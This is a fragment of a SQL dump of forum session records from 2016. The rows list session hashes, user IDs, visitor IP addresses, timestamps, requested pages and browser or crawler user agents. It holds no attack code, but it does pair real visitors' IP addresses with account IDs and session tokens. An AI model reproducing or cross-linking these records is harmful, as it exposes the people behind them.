('3b23bd534b35866815b8f648ec7ff534', 0, '157.55.39.158', '23f3103f44bc3badcba53554e5e4cb6d', 1471040301, '/index.php', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f8959175b399e3d192e1e5141cc7c816', 0, '85.118.134.144', '0f550c27d3c7e399a0eb223615be0b13', 1471043427, '/index.php?langid=2', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3e8ebf140c728294687d3bc876e9c975', 0, '73.139.22.175', '4f56e453c07dd8fbd863dfb747276e54', 1471045513, '/showthread.php?t=2480', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d2396fdc670cdcd78f2b4aaa6bdfe4fd', 0, '172.68.58.120', 'a938925ca9403f145c82d10ebc1ecbe1', 1475086777, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('c36852f9a52a7d1b6cdb4a8fe2987617', 0, '66.249.69.63', 'a938925ca9403f145c82d10ebc1ecbe1', 1471058902, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8e24e5ee06734d9be2aaa9095c98c9d5', 0, '172.68.59.122', 'a938925ca9403f145c82d10ebc1ecbe1', 1475084325, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1888a2b77973267024987808c7b06462', 0, '136.243.227.137', 'd55ddd2b5ff93f11f7723bc5fe9e4042', 1473132292, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2e1083893e8f7c110f653774bb77cd18', 0, '164.132.161.73', 'f069ebb6a315f0439dd2baf44ddfa550', 1471083997, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('92ae1cc1bb1104f8293e6bf7fc79e731', 0, '157.55.39.99', '23f3103f44bc3badcba53554e5e4cb6d', 1471155402, '/misc.php?do=bbcode', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('29ae79d53afdd03863b43243b33072d5', 0, '78.0.209.212', '2475713a0e483d914c7bf1d6f24de8fa', 1471088339, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0e85d2241abc9b35ed33d8fa1f039b0e', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471089690, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('e34227e1b9d0d838f35469da8bc2131b', 0, '207.46.13.40', '5e207e311e22cdc3b2095126a922fa93', 1471148502, '/forumdisplay.php?f=37', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('90b95db37e9259f9f3c638bb97318cba', 0, '172.68.58.111', 'a938925ca9403f145c82d10ebc1ecbe1', 1471090366, '/showthread.php?p=2697', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('78b507d7de0cd873cfd088f5ae7d2361', 0, '84.215.38.167', '16173d223037f6efdaf8fabb0600ba6d', 1471092956, '/memberlist.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('534b5ac8dd496cd5f7af7501d46973c2', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471132741, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('80e6ac7ca24999907ceb7fc60ce727da', 0, '86.9.73.25', '387ade6ee840a64a45ade469a6457064', 1471134105, '/faq.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('886fed03caa6996c9cfe0485ce096ad4', 0, '72.185.164.223', '58848aec7f66215902d63465a4144e69', 1471138614, '/memberlist.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c8fe71b5b8bc8570f50aa71a4cc7e84b', 0, '172.68.58.120', 'dce73380cf0fd3aff82da93d9252bb04', 1474760810, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('425431baf8eca685461e740735757ab1', 0, '66.249.69.57', 'dce73380cf0fd3aff82da93d9252bb04', 1471140160, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('28a7998d7362b98482afc00f2a2a1fd3', 0, '66.249.69.53', 'a938925ca9403f145c82d10ebc1ecbe1', 1471147565, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('53c1d5505f4943cf2f10d64a636e0f4b', 0, '207.46.13.13', '5e207e311e22cdc3b2095126a922fa93', 1471148490, '/archive/index.php/f-37.html', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('ce5cf6f3d1923da6acafded7f6f97868', 0, '124.104.226.32', 'f0e0dad597b3cf54ceb9d1f06dd7834e', 1471158102, '/index.php', 'Mozilla/5.0 (Linux; Android 5.1.1; Alcatel Flash Plus Build/LMY48Y) AppleWebKit/537.36 (KHTML, like', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0a4b26828019ba3118db558292f04926', 0, '37.154.184.136', 'd1cfbc46779512d8904e6504cf36b5ce', 1471162059, '/index.php', 'Mozilla/5.0 (Linux; Android 4.4.2; ASUS_T00J Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Ch', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('4000022c08a34b6e3921e6c694d289da', 0, '193.52.24.7', '86b91196e707e56c828be4cbf4c5b70a', 1471182519, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b1c7f8bfc296298b551b57a392f5c047', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471175551, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7064595f7205b7c82750ddd8e05ba4b5', 0, '109.103.126.2', '1e6cd70c14499cd50675147f39814025', 1471179182, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('15c0b1a74ce2addc52a40130cc75185a', 0, '199.21.99.214', '5b0cb54f421881da85b8db222ee9f3cd', 1475338110, '/showthread.php?p=2927', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d9855d7f294c7b1683913ac221868079', 0, '172.68.10.241', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1471188722, '/search.php?searchthreadid=2369', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6e380bdf99ac537e1950f53e07930c6a', 0, '88.251.118.93', '15d25a2b1270ff99bf878b720342912f', 1471191612, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('67ae3a93f2c39d5f755aef35425e18e2', 0, '172.68.10.242', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1471194240, '/showthread.php?t=2469', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('04fb54aa22990d9b64b27007c49efa74', 0, '172.68.11.246', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475278611, '/showthread.php?t=1836', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7852a254c9069f7129218eec4abe381c', 0, '172.68.11.251', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1471195112, '/showthread.php?p=2048', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('28be610a754d0aaec6799b26f45abf04', 0, '111.93.229.92', 'fc728267e9ef712615cfd5a6859409da', 1471202451, '/index.php', 'python-requests/2.10.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fde54a5287f03aca54291c126e6a986c', 0, '172.68.10.254', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1475338114, '/showthread.php?p=2927', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ee8fc63f3e7a2d5a04ec09cd8f078df8', 0, '187.158.251.15', '5af9316cfef0c5e70ead0550e39012df', 1472235687, '/showpost.php?p=3015&postcount=1', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f8b4dda5c6212da448c3e8498106d5d2', 0, '85.118.134.144', 'e23218c85b8db889b4e8f4177cf0843e', 1471204020, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f28720b2ff4eaeabd7b20b2595fde5e7', 0, '172.68.10.236', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1472587670, '/showthread.php?t=2382', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('376828ab43f9990c31ed44c431087d1b', 0, '172.68.11.205', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1471559781, '/archive/index.php/t-1697.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('286de674c444ac03847367f1062721d5', 0, '114.143.55.77', '16d2e3c3ceafe5ff3dc1547bdd4644b9', 1474130502, '/faq.php?', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ea4e632a37a4a97a5fcd1f5fb5aa168e', 0, '217.150.84.69', '8e21f71df2c526a50acd40b49addfd65', 1471216257, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ca7d248116e1aaad4beb318374517596', 0, '88.243.112.59', '6386a71c92a8bf7cf8cb08e4b08e1b6b', 1471218709, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('642919197ceca701d366d36f7aa7d92f', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471220615, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('6ec2c2029d8abdd60f74e9efe26d09e9', 0, '77.247.181.162', '99091e3e983bd1550055c12fbd58a63d', 1471255343, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa20ebba23ecd590e309eaf6f90d95cd', 0, '176.59.105.66', '255b26a887d3a8563d132e932a61545b', 1471258712, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c85dc6622a2b2d202f0f521d6c8b3540', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471265528, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('3cb1b648df074b919b757463921c8ed9', 0, '92.40.248.166', '6a0983f8f66f1b3ad6808b4c8b4664b0', 1471305995, '/index.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e9aeef80c4f261d9d8e699f8fac17398', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471308363, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('9ead1dfbb91c209b987b8c4e71d66f8b', 0, '46.118.112.151', 'cacc9d0bba1eaee47b9852761d3edbb6', 1471309567, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Dragon/36.1.1.21 Chrome/3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cd64a28d138ea4a5d0c9ec83bfa7202d', 0, '172.68.11.201', '5f508cd82fa7ae0e1cf900dc2b6eebf8', 1472338269, '/archive/index.php/t-1031.html', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('03cea20127ab1785c46859c36e7ba87a', 161, '54.233.145.152', 'd8752cf67051540a22ada9c27a70dc20', 1471338483, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('19248b5c09e11516820d81007ec45f96', 0, '77.100.229.156', '68c2ae2f440e4095154ea8aeb722fa0a', 1471348006, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e6d9f4b9151ce269a0e4a99f9c33f9ce', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471351487, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c7b5879afba2d764ccd044c52800aabf', 0, '172.68.11.253', '2f6091554dddabbe374daa6d58d1d059', 1471357367, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('64e44e57c5fdadb46846aaf7628ee500', 0, '172.68.10.238', '5705ebc41cb5e0c8fcf05b066d2081b7', 1471366512, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Saf', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2ba13c51c8b46c5894358058fa65647b', 0, '94.191.188.234', 'a291ac672705b87f7533e068df12ba91', 1471371152, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cdcb640a3b708343fe0bd31f8a7d406e', 0, '78.167.208.43', 'ab27e43edc649fc78d03e8d8f306b351', 1471387986, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a69d1200ebf0580fb8b8d689d422d803', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471394446, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('7fca78e18532f60776a81e266911d7af', 0, '23.92.123.27', '663c6c78d9b4dde499b6835897952498', 1471412331, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Iron/29.0.1600.1 Chrome/2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('30227048fbfb94f46d9b2472651124c2', 0, '186.149.83.203', '3fb3d70a65cfc7276f01ae97bb534cc5', 1471415374, '/index.php', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('53e8d8aeb9d22e12a4d3d783597c62a2', 0, '41.130.69.198', '387e3a92e9ee22628ef18e84479a02f1', 1471418957, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7aa21bd89d90ebdc4ea17a65bd6eb86d', 0, '5.254.65.35', '2e693a26407900bb25ffbe28d10ff227', 1471420947, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fb1ff1d0cc654b4615e3c26f380e0920', 44, '120.56.168.42', '8d19dd56e9f332203f4ae7bf26defd7a', 1471427686, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('f3eef7a774b618d455a996f2018db402', 0, '130.193.190.151', '613716c854e26aaae92e768392737f45', 1471429615, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5aeed96bd516d50aafe905171c061881', 0, '94.191.189.5', '119d8d102f494d199e6f711b8480c147', 1471435874, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aa76b40b1e46240dbfc3ce68ff8a2867', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471437286, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('99df195fa97e4d13ff3ade03c7184604', 0, '81.214.43.159', '591430fa42fb27d764e1523f45c6cd10', 1471446225, '/index.php', 'Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c8d1e36ca1ff0741f90e1ceaf952a031', 0, '37.152.145.180', '3b7ce85c6e00c70e55ceffb3ea817e06', 1471461315, '/faq.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('614054dd3c10b20660b7683744cc9e4f', 0, '107.172.9.15', 'ffbe5bd836c0dbf35ea0f50d099f7436', 1471461733, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('aa4237233a06d4a9458890c98b183e64', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471480166, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('dcca512c892bcef88b0c283da84388a9', 0, '39.54.80.150', '9a208f498f0fab90d40e24d05fa13c27', 1471482420, '/search.php?do=getdaily', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('92d7757e890c84fb2858d5fc19559884', 173, '216.164.19.30', '4f65afbd1a55b9982b30e5ab12e13fb9', 1471485635, '/sendmessage.php', 'Mozilla/5.0 (compatible; Windows NT 6.4; SV3; WOW64; IA64, X11; en-US) AppleWebKit/9537.53+ Chrome/5', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('c5bc0f4cdc1f07b4a55790a9b4c4ffb1', 0, '1.55.195.33', 'eb542f1450662b94552348c6ea0b88b1', 1471497450, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('661a5a40f3097df0977e69e71ff63698', 0, '195.41.118.51', 'a350844d25634376631981c9a48dce89', 1473456221, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5 Build/MOB30Z; wv) AppleWebKit/537.36 (KHTML, like Gecko)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6555061840edc590f42c415c1a1a437', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471522923, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('61a0203cdbe94789ca4cd8b34bf4d3cc', 0, '2a02:908:2210:c', '31350a89588c03815fe7dfcc9b2f86b5', 1471532933, '/memberlist.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Ver', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('25858899bfabbce4d991f52852501da4', 0, '220.158.205.145', 'e91bb3dd91a12bc55816c09e15779a7d', 1471533032, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cea679351d3c8edc7634101afebf90cd', 0, '93.178.204.234', '02e2a1bc2f7ec42b8e0fdaeef98bc6c5', 1471538140, '/showthread.php?t=1841', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('add5ee218132bc670ffa31155164c5f3', 0, '172.68.29.150', '17266ddf94e25b93ef2704e31cdf7ea2', 1471551964, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6b7500b76f32f361f463e6737fa8a1e3', 0, '72.205.196.41', 'bb6e7d08fa0dc1300b7b1325d4d0fdd2', 1471553822, '/index.php?', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('35a44e2b9355b2e132c4347f177e26bd', 0, '207.46.13.138', '5e207e311e22cdc3b2095126a922fa93', 1471991185, '/misc.php?do=bbcode', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e8cc662ea3983f8241c1da183f13173c', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471566053, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('a747ebac09a659a5e8f33ead4cb77881', 0, '69.159.172.245', '2fa60169112be2e4d29762626a8ef252', 1471569185, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fa95871dc95af644a8151969a08aa7a9', 0, '41.105.58.168', '8710a1687c5dfffbea85786bc7f96536', 1471581693, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('27061a7fcb7ce6f631294b0362158666', 0, '176.42.158.168', 'a28314507d7c52f6acc9cb8ea4a499a4', 1471610443, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('59ac88e522cb625f1d2d0d8f7467aacb', 0, '5.220.253.236', '0e78bd99a6c73d14c651f5cb3e29db89', 1471610815, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.11', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7614875318ae7793698b8e21b7b51c89', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471611083, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c8aee7039b39fceac96044cf623a5665', 0, '69.159.172.245', '288603ac5a878ddc8d0a70190f8c5f82', 1471633718, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('627779d256b9285cb5b4750015f28554', 0, '79.106.109.177', '64612fc7096b35d9ec6ea02f6ee32f87', 1471642484, '/login.php?do=logout&logouthash=1471642480-ea8d2456d9d8289abcdc27963f0bca4cb0e9b0fc', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d00cf39dd453444fe4bff702efd3b113', 0, '66.249.79.72', '42382f72607791905ff50694f07a1e96', 1474710500, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('6447e200f6f7c5a31665a4fe9bd648a4', 133, '172.68.58.97', '6e9dca07b2c2f4e35c2c80298e236a58', 1471654165, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('5b02c725093df42984eb5d6f73328501', 0, '109.201.154.150', 'e08f9afd9ee86e2f8a78613fc8041da9', 1471825235, '/index.php', 'yacybot (freeworld/global; amd64 Linux 3.12.43-52.6-default; java 1.8.0_40; Europe/en) http://yacy.n', 0, 0, 0, 0, 0, 0, 2, 0, 0),
